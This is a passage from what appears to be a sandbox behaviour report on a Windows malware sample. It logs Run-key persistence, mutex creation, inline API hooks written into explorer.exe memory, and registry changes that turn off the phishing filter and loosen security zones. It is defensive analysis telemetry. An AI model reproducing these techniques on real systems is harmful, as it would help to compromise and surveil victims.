0E 5D 43 88 8A 81 FD 90 27 08 5E F2 11 39 20 9D 34 48 6B F9 8F F3 A0 7D 13 76 5F 15 C8 59 7B 9E AD 05 0B EB 3C 16 60 F5 C4 BA 26 00 1A 13 E4 11 94 2C 79 2A 7C 61 E6 16 AD FA 8B 86 1E 0A 44 89 1A BD 37 45 0B AB 43 3C 6F D5 87 D5 FF A5 EF 97 6F 96 89 4F 15 40 4B BC 92 E5 31 44 23 48 7C AF F5 EC 6B 42 37 85 4D B6 A8 A7 54 9F 03 3A 9A BE 97 DD 36 91 16 5A A3 40 A9 C7 F0 75 7A 68 FE CD 5D D5 8F F7 43 C5 88 87 9A E5 BA DD B3 4E 42 35 96 79 E7 66 82 58 E9 5D 0C 37 D1 DE 1C C2 29 F9 B4 C3 D7 F4 82 D5 8D 17 CC FA 7B CC 71 7D 04 F5 56 75 92 68 A1 B0 F3 7C FD E4 B9 E9 DD B0 88 78 E9 87 A2 1A 7E 50 A2 08 1F 97 F7 05 68 AE 5F 71 45 69 3D F8 BB 10 DF D5 F2 65 F8 1D 8A FA 75 6B 72 41 E2 CD 28 06 EE A7 84 FF 8C 0B F7 46 A9 8F D0 E1 9F B2 BB C5 1C 1A FF D4 FC 9D 8D 8D DE EC C1 C0 E6 CA 29 3F 2B 87 BA 75 C6 92 9B 78 DD 88 F0 3F EA CC 79 A8 30 55 CF 97 42 1A FE 97 FB 22 92 0E 09 A3 36 1F 08 2F 2C 28 D9 30 9B 13 1B A2 A2 78 F6 AC E4 75 A0 6F FE 89 A4 08 5B F7 BF 1A 99 17 86 77 74 14 28 DC 28 FD 16 BE DF E7 F8 E3 09 96 1A 7A B6 64 C8 56 9A E9 16 D4 F5 A6 84 EF F3 FE 97 36 CA 90 CA A4 44 37 06 43 A5 D2 23 CE 6A FE CE 78 2A CB 3B D3 2E 67 36 9F B0 89 61 28 DF F8 76 06 2C D8 A6 E7 58 C0 C7 68 01 A8 46 AA 1B 1A 42 DF B9 2E 22 36 2C 42 57 B1 3E 69 12 E5 6E 04 01 14 80 9B E7 BC 15 C9 EB 31 DB B7 25 C0 DB 8D 59 12 91 D3 B3 46 A8 D6 D7 65 63 10 51 4A D8 BD 96 08 24 36 E0 F2 64 6B DA 5B D1 59 38 BB B1 54 66 4C AC 24 0C F7 EF C9 8F EA 65 25 58 79 64 6B 90 EE 0A 1B 2D A1 30 7A 2D 41 23 72 F6 E7 27 99 9E 12 1E 07 1E 4E E8 0B 64 34 5E D6 AE 78 BB DF 06 C6 79 D4 3C 7E FA 17 C8 AA 09 F9 DF E3 06 A3 F4 B9 82 72 98 31 5C C6 E4 D1 C4 DD 14 B9 A2 F8 B3 9E D7 F1 43 success or wait 1 1F89F1A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Okmaykid Binary 96 8D 31 C9 C5 75 08 F8 84 53 9B D1 F4 B9 61 28 10 B5 F1 08 71 3F 43 D6 C5 E1 62 1A C6 5B 19 DC CC D6 C6 9D C6 B3 0A 3C 08 2E 18 33 00 4D BE 0B 36 BD B7 A3 BD 92 EA 03 1F E4 1B C7 16 2B 45 CA B5 08 9E BA 6B 0D 91 DA 05 B1 6F 8F BD 44 64 5A BF 72 4F 66 A5 9E C5 70 A4 30 85 A9 DA E1 B0 C2 84 42 08 3E FA A7 EC BB C8 A3 E1 74 73 02 2C 20 4D 52 81 9C success or wait 1 1F89F1A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Isic Binary 9F FB 8A 01 CE CB 89 99 78 8F 7A 24 04 EC BF 69 88 AB 89 AB 82 CC B0 25 36 12 91 E9 34 A9 EB 2E 57 1B F6 70 61 B9 F3 01 0E 38 7F 2B 4F B6 85 BD 81 0A 1D 97 0A 25 5D 94 98 63 9C 40 81 BC D2 5D 0F AC 89 8E EC 10 21 E4 E9 91 3B 00 C6 6B 24 D2 success or wait 1 1F89F1A
+ Key value queried
Key Path Name Completion Count Source Address
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Enabled object name not found 1 1F89EC7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter EnabledV8 success or wait 1 1F89EC7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\Privacy 1406 success or wait 1 1F89EC7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\Privacy 1609 success or wait 1 1F89EC7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 1406 success or wait 1 1F89EC7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 1609 success or wait 1 1F89EC7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 1406 success or wait 1 1F89EC7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 1609 success or wait 1 1F89EC7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 1406 success or wait 1 1F89EC7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 1609 success or wait 1 1F89EC7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 1406 success or wait 1 1F89EC7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 1609 success or wait 1 1F89EC7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 Okmaykid object name not found 1 1F89F57
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 Okmaykid object name not found 1 1F89F57
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Ebci object name not found 1 1F89F57
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters Ebci object name not found 1 1F89F57
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters Okmaykid success or wait 1 1F89F57
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters Okmaykid success or wait 1 1F89F86
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Account Manager\Accounts NULL success or wait 1 1F89EC7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Ebci buffer overflow 4 1F89F57
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Ebci success or wait 2 1F89F86
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Ebci buffer overflow 2 1F89F57
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Ebci success or wait 1 1F89F86
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Okmaykid success or wait 2 1F89F57
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters Ebci buffer overflow 2 1F89F57
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters Ebci success or wait 1 1F89F86
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters Okmaykid success or wait 2 1F89F57
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Okmaykid success or wait 2 1F89F57
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Isic object name not found 1 1F89F57
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Okmaykid success or wait 2 1F89F57
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} object name not found 1 1F89FC6
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\Global\{366BFE45-C6D8-191D-185B-81F8EE8A3A3D} success or wait 1 1F84C09
\BaseNamedObjects\Global\{50BFCA5C-F2C1-7FC9-185B-81F8EE8A3A3D} success or wait 2 1F7C0F6
\BaseNamedObjects\Global\{366BFE4A-C6D7-191D-185B-81F8EE8A3A3D} success or wait 1 1F84C09
\BaseNamedObjects\Global\{D2C7FACE-C253-FDB1-185B-81F8EE8A3A3D} success or wait 1 1F84C09
\BaseNamedObjects\Global\{3A87297E-11E3-15F1-185B-81F8EE8A3A3D} success or wait 1 1F84C09
\BaseNamedObjects\Global\{3A87297F-11E2-15F1-185B-81F8EE8A3A3D} success or wait 1 1F84C09
\BaseNamedObjects\Global\{C5C44599-7D04-EAB2-185B-81F8EE8A3A3D} success or wait 2 1F84C09
\BaseNamedObjects\Local\{5B619F6A-A7F7-7417-185B-81F8EE8A3A3D} success or wait 1 1F84C09
\BaseNamedObjects\Local\{5B619F69-A7F4-7417-185B-81F8EE8A3A3D} success or wait 1 1F84C09
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-C250-CCC334817706} success or wait 6 1F84B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-AE51-CCC358807706} success or wait 6 1F84B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-A252-CCC354837706} success or wait 6 1F84B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BA52-CCC34C837706} success or wait 6 1F84B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-6E52-CCC398837706} success or wait 6 1F84B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-7252-CCC384837706} success or wait 6 1F84B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BA53-CCC34C827706} success or wait 6 1F84B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0E53-CCC3F8827706} success or wait 6 1F84B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-DA54-CCC32C857706} success or wait 6 1F84B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-8A54-CCC37C857706} success or wait 6 1F84B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BE54-CCC348857706} success or wait 6 1F84B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1E55-CCC3E8847706} success or wait 6 1F84B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-E257-CCC314867706} object name exists 6 1F84B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0651-CCC3F0807706} success or wait 6 1F84B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-3A51-CCC3CC807706} success or wait 6 1F84B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0257-CCC3F4867706} success or wait 6 1F84B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-2A50-CCC3DC817706} object name exists 6 1F84B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1252-CCC3E4837706} success or wait 6 1F84B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-A654-CCC350857706} success or wait 6 1F84B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1657-CCC3E0867706} success or wait 6 1F84B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-7658-CCC380897706} success or wait 6 1F84B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1E58-CCC3E8897706} success or wait 6 1F84B82
\BaseNamedObjects\Global\{C1D048FE-7063-EEA6-185B-81F8EE8A3A3D} success or wait 1 1F84C09
\BaseNamedObjects\Global\{50BFCA5D-F2C0-7FC9-185B-81F8EE8A3A3D} success or wait 1 1F7614F
Process Activities:
+ Process started
PID Filepath Cmdline Flags Completion Count Source Address
604 C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat 0 success or wait 1 1F874EF
Thread Activities:
+ Thread created
TID PID EIP Injected Filepath Completion Count Source Address
3996 1636 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 1F89D4C
3984 1636 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 1F89D4C
3988 1636 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 1F89D4C
4012 1636 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 1F89D4C
4016 1636 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 1F89D4C
4020 1636 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 1F89D4C
4024 1636 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 1F89D4C
772 1636 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 1F876AC
+ Thread delayed
TID Delay Completion Count Source Address
1906 0s success or wait 1 1F7C324
Memory Activities:
+ Memory read
PID Filepath Base Length Value Completion Count Source Address
1636 C:\WINDOWS\explorer.exe 7C90D1AE 30 B8 35 00 00 00 BA 00 03 FE 7F FF 12 C2 20 00 90 B8 36 00 00 00 BA 00 03 FE 7F FF 12 C2 10 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 7C91632D 30 68 6C 02 00 00 68 80 64 91 7C E8 8F 85 FF FF A1 C8 E0 97 7C 89 45 E4 8B 45 08 89 85 B4 FD success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 7C811195 30 8B FF 55 8B EC 83 EC 64 83 7D 0C 01 56 57 0F 8D 13 AE 01 00 33 F6 39 75 0C 0F 8C 08 AE 01 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 3D94FABE 30 8B FF 55 8B EC 51 51 53 56 33 DB 57 33 F6 33 FF 39 5D 08 89 5D FC 89 5D F8 0F 84 2A EB 03 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 3D95EE89 30 8B FF 55 8B EC 6A 10 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 19 FD FE FF 5D success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 3D9BA6BF 30 8B FF 55 8B EC 51 51 53 33 C0 21 45 FC 21 45 F8 56 57 33 FF 33 DB 33 C9 33 D2 39 45 08 75 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 3D9BA666 30 8B FF 55 8B EC 53 56 57 33 DB 33 C9 33 D2 33 F6 33 FF 39 5D 10 75 2C 8B 45 0C 85 C0 74 14 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 3D949088 30 8B FF 55 8B EC 51 51 53 56 57 33 DB 33 FF F6 05 78 11 9E 3D 01 89 5D FC 0F 84 D9 6A 01 00 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 3D94654B 30 8B FF 55 8B EC 83 EC 24 53 56 57 33 FF 39 3D B8 11 9E 3D 89 7D F4 89 7D F8 89 7D F0 C7 45 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 3D963381 30 8B FF 55 8B EC 83 EC 20 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D FC 89 5D F4 89 5D F8 C7 45 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 3D94BF83 30 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D FC C7 45 F8 01 00 00 00 0F success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 3D94878D 30 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D F8 89 5D FC 0F 84 C3 65 04 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 71AB3E2B 30 8B FF 55 8B EC 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 BC 4F 00 00 E8 3A E8 FF FF 85 C0 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 71AB4C27 30 8B FF 55 8B EC 83 EC 10 56 57 33 FF 81 3D 50 40 AC 71 29 2C AB 71 0F 84 25 6A 00 00 8D 45 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 71AB68FA 30 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 CD 4D 00 00 8D 45 F8 50 E8 98 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 7E41ECA3 30 B8 D7 11 00 00 BA 00 03 FE 7F FF 12 C2 0C 00 90 90 90 90 90 6A 2F 6A 01 E8 EE 97 FF FF 6A success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 7E41FE6E 30 B8 2E 12 00 00 BA 00 03 FE 7F FF 12 C2 04 00 33 FF 47 83 7D E4 FF 0F 85 AC AC FF FF C7 45 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 7E428D20 30 6A 14 68 90 8D 42 7E E8 94 F8 FE FF E8 0B F9 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 7E42C17E 30 6A 14 68 F0 C1 42 7E E8 36 C4 FE FF E8 AD C4 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 7E423D3A 30 8B FF 55 8B EC 8B 4D 08 E8 99 47 FF FF 85 C0 74 11 6A 00 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 7E43E577 30 8B FF 55 8B EC 8B 4D 08 E8 5C 9F FD FF 85 C0 74 11 6A 01 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 7E430833 30 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 14 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 7E44F965 30 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 D7 0E FE FF 5D C2 14 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 7E430A47 30 8B FF 55 8B EC 6A 00 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 10 00 90 90 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 7E44F9B4 30 8B FF 55 8B EC 6A 01 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 9C 10 FE FF 5D C2 10 00 90 90 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 7E42A01E 30 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 89 FF FF FF 5D C2 14 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 7E42A97D 30 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 2A F6 FF FF 5D C2 14 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 7E41A39A 30 8B FF 55 8B EC 83 EC 30 8B 45 08 56 57 6A 09 59 8D 70 04 8B 00 8D 7D D8 F3 A5 89 45 D4 33 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 7E42EA5E 30 8B FF 55 8B EC 83 EC 30 8B 45 08 56 57 6A 09 59 8D 70 04 8B 00 8D 7D D8 F3 A5 89 45 D4 33 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 7E41AF7F 30 8B FF 55 8B EC 8B 45 08 83 38 30 0F 85 0B E7 02 00 68 00 01 00 00 6A 00 6A 00 50 E8 C5 F1 success or wait 1 1F8A4F3
+ Memory written
PID Filepath Base Length Value Completion Count Source Address
1636 C:\WINDOWS\explorer.exe 1810000 10 B8 35 00 00 00 E9 A9 D1 0F 7B success or wait 1 1F8A569
1636 C:\WINDOWS\explorer.exe 7C90D1AE 5 E9 33 B7 66 85 success or wait 1 1F8A591
1636 C:\WINDOWS\explorer.exe 181000A 10 68 6C 02 00 00 E9 1E 63 10 7B success or wait 1 1F8A569
1636 C:\WINDOWS\explorer.exe 7C91632D 5 E9 94 27 66 85 success or wait 1 1F8A591
1636 C:\WINDOWS\explorer.exe 1810014 10 8B FF 55 8B EC E9 7C 11 00 7B success or wait 1 1F8A569
1636 C:\WINDOWS\explorer.exe 7C811195 5 E9 CE 79 76 85 success or wait 1 1F8A591
1636 C:\WINDOWS\explorer.exe 181001E 10 8B FF 55 8B EC E9 9B FA 13 3C success or wait 1 1F8A569
1636 C:\WINDOWS\explorer.exe 3D94FABE 5 E9 97 45 63 C4 success or wait 1 1F8A591
1636 C:\WINDOWS\explorer.exe 1810028 10 8B FF 55 8B EC E9 5C EE 14 3C success or wait 1 1F8A569
1636 C:\WINDOWS\explorer.exe 3D95EE89 5 E9 20 52 62 C4 success or wait 1 1F8A591
1636 C:\WINDOWS\explorer.exe 1810032 10 8B FF 55 8B EC E9 88 A6 1A 3C success or wait 1 1F8A569
1636 C:\WINDOWS\explorer.exe 3D9BA6BF 5 E9 3E 9A 5C C4 success or wait 1 1F8A591
1636 C:\WINDOWS\explorer.exe 181003C 10 8B FF 55 8B EC E9 25 A6 1A 3C success or wait 1 1F8A569
1636 C:\WINDOWS\explorer.exe 3D9BA666 5 E9 33 9B 5C C4 success or wait 1 1F8A591
1636 C:\WINDOWS\explorer.exe 1810046 10 8B FF 55 8B EC E9 3D 90 13 3C success or wait 1 1F8A569
1636 C:\WINDOWS\explorer.exe 3D949088 5 E9 AD B1 63 C4 success or wait 1 1F8A591
1636 C:\WINDOWS\explorer.exe 1810050 10 8B FF 55 8B EC E9 F6 64 13 3C success or wait 1 1F8A569
1636 C:\WINDOWS\explorer.exe 3D94654B 5 E9 2D DD 63 C4 success or wait 1 1F8A591
1636 C:\WINDOWS\explorer.exe 181005A 10 8B FF 55 8B EC E9 22 33 15 3C success or wait 1 1F8A569
1636 C:\WINDOWS\explorer.exe 3D963381 5 E9 36 0F 62 C4 success or wait 1 1F8A591
1636 C:\WINDOWS\explorer.exe 1810064 10 8B FF 55 8B EC E9 1A BF 13 3C success or wait 1 1F8A569
1636 C:\WINDOWS\explorer.exe 3D94BF83 5 E9 7E 83 63 C4 success or wait 1 1F8A591
1636 C:\WINDOWS\explorer.exe 181006E 10 8B FF 55 8B EC E9 1A 87 13 3C success or wait 1 1F8A569
1636 C:\WINDOWS\explorer.exe 3D94878D 5 E9 A0 BB 63 C4 success or wait 1 1F8A591
1636 C:\WINDOWS\explorer.exe 1810078 10 8B FF 55 8B EC E9 AE 3D 2A 70 success or wait 1 1F8A569
+ Memory allocated
PID Filepath Base Length Protection Completion Count Source Address
1636 C:\WINDOWS\explorer.exe 2950000 294F6A8 page read and write success or wait 1 1F84961
1636 C:\WINDOWS\explorer.exe 2950000 294F6AC page read and write success or wait 1 1F84961
1636 C:\WINDOWS\explorer.exe 1810000 294F47C page execute and read and write success or wait 1 1F81A36
1636 C:\WINDOWS\explorer.exe 2B50000 294E9C8 page read and write success or wait 30 1F8AED8
+ Memory attributes changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address
1636 C:\WINDOWS\explorer.exe 7C90D1AE 1000 page execute and read and write page execute read success or wait 1 1F8A4CC
1636 C:\WINDOWS\explorer.exe 1810000 1000 page execute and read and write page execute and read and write success or wait 1 1F8A569
1636 C:\WINDOWS\explorer.exe 1810000 1000 page execute and read and write page execute and read and write success or wait 52 1F8A569
1636 C:\WINDOWS\explorer.exe 7C90D1AE 1000 page execute and read and write page execute and write copy success or wait 1 1F8A591
1636 C:\WINDOWS\explorer.exe 7C90D000 1000 page execute and write copy page execute and write copy success or wait 1 1F8A591
1636 C:\WINDOWS\explorer.exe 7C90D1AE 1000 page execute read page execute and read and write success or wait 1 1F8A5AD
1636 C:\WINDOWS\explorer.exe 7C91632D 1000 page execute and read and write page execute read success or wait 1 1F8A4CC
1636 C:\WINDOWS\explorer.exe 181000A 1000 page execute and read and write page execute and read and write success or wait 1 1F8A569
1636 C:\WINDOWS\explorer.exe 7C91632D 1000 page execute and read and write page execute and write copy success or wait 1 1F8A591
1636 C:\WINDOWS\explorer.exe 7C916000 1000 page execute and write copy page execute and write copy success or wait 1 1F8A591
1636 C:\WINDOWS\explorer.exe 7C91632D 1000 page execute read page execute and read and write success or wait 1 1F8A5AD
1636 C:\WINDOWS\explorer.exe 7C811195 1000 page execute and read and write page execute read success or wait 1 1F8A4CC
1636 C:\WINDOWS\explorer.exe 1810014 1000 page execute and read and write page execute and read and write success or wait 1 1F8A569
1636 C:\WINDOWS\explorer.exe 7C811195 1000 page execute and read and write page execute and write copy success or wait 1 1F8A591
1636 C:\WINDOWS\explorer.exe 7C811000 1000 page execute and write copy page execute and write copy success or wait 1 1F8A591
1636 C:\WINDOWS\explorer.exe 7C811195 1000 page execute read page execute and read and write success or wait 1 1F8A5AD
1636 C:\WINDOWS\explorer.exe 3D94FABE 1000 page execute and read and write page execute read success or wait 1 1F8A4CC
1636 C:\WINDOWS\explorer.exe 181001E 1000 page execute and read and write page execute and read and write success or wait 1 1F8A569
1636 C:\WINDOWS\explorer.exe 3D94FABE 1000 page execute and read and write page execute and write copy success or wait 1 1F8A591
1636 C:\WINDOWS\explorer.exe 3D94F000 1000 page execute and write copy page execute and write copy success or wait 1 1F8A591
1636 C:\WINDOWS\explorer.exe 3D94FABE 1000 page execute read page execute and read and write success or wait 1 1F8A5AD
1636 C:\WINDOWS\explorer.exe 3D95EE89 1000 page execute and read and write page execute read success or wait 1 1F8A4CC
1636 C:\WINDOWS\explorer.exe 1810028 1000 page execute and read and write page execute and read and write success or wait 1 1F8A569
System Activities:
+ System information queried
System info class Completion Count Source Address
ProcessInformation success or wait 23 1F872E5
CurrentTimeZoneInformation success or wait 3 1F85D9C
Token Activities:
+ Token privilege adjusted
Status Privilege Completion Count Source Address
on Security success or wait 1 1F87391
+ Chronological sections
Operation Data Completion Time
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2950000 Length: 294F6A8 Allocation Type: null Protection: page read and write success or wait 1986859950
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2950000 Length: 294F6AC Allocation Type: null Protection: page read and write success or wait 1986860194
File opened Path: C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.dat Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 1986869838
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: Enabled object name not found 1986870593
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: EnabledV8 success or wait 1986871107
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: EnabledV8 Type: Dword Data: 0 success or wait 1986872392
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\Privacy Name: CleanCookies Type: Dword Data: 0 success or wait 1986876122
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\Privacy Name: 1406 success or wait 1986877541
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\Privacy Name: 1609 success or wait 1986878065
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 Name: 1609 Type: Dword Data: 0 success or wait 1986879161
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 Name: 1406 success or wait 1986880441
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 Name: 1406 Type: Dword Data: 0 success or wait 1986881525
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 Name: 1609 success or wait 1986881980
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 Name: 1609 Type: Dword Data: 0 success or wait 1986883162
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 Name: 1406 success or wait 1986883636
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 Name: 1406 Type: Dword Data: 0 success or wait 1986884880
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 Name: 1609 success or wait 1986886282
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 Name: 1609 Type: Dword Data: 0 success or wait 1986887531
